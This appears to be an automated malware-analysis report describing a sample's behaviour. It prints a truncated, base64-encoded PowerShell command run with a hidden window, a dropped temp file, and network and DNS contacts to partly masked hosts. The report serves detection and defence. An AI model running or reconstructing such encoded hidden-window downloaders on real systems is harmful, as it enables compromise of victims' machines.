Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
Modifies file system
Creates the following files
- %TEMP%\814684.cvr
Network activity
Connects to
- 'bs##000.com':80
- 'ba###boom.com':80
- 'co######ptingbangkok.clinic':443
- 'vi##.com':443
TCP
HTTP GET requests
- http://bs##000.com/aspnet_client/bw/
Other
- 'co######ptingbangkok.clinic':443
- 'vi##.com':443
UDP
- DNS ASK bs##000.com
- DNS ASK ba###boom.com
- DNS ASK co######ptingbangkok.clinic
- DNS ASK vi##.com
- DNS ASK ko######-sarzamin-man.ir
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...' (with hidden window)
